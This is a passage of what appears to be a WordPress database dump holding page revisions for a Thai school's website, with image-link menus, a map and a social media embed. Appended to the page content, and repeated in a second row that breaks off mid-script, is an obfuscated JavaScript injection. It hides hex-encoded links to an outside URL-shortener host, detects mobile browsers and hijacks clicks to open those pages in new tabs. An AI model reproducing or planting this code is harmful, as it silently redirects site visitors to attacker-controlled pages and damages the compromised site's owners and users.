{\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-02 11:02:54','2025-07-02 04:02:54','',14,'http://pakhaeng.ssk.in.th/?p=1613',0,'revision','',0),
(1614,1,'2025-07-02 11:03:57','2025-07-02 04:03:57','','5','','inherit','','closed','','5-4','','','2025-07-02 11:03:57','2025-07-02 04:03:57','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png',0,'attachment','image/png',0),
(1616,1,'2025-07-02 11:04:43','2025-07-02 04:04:43','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 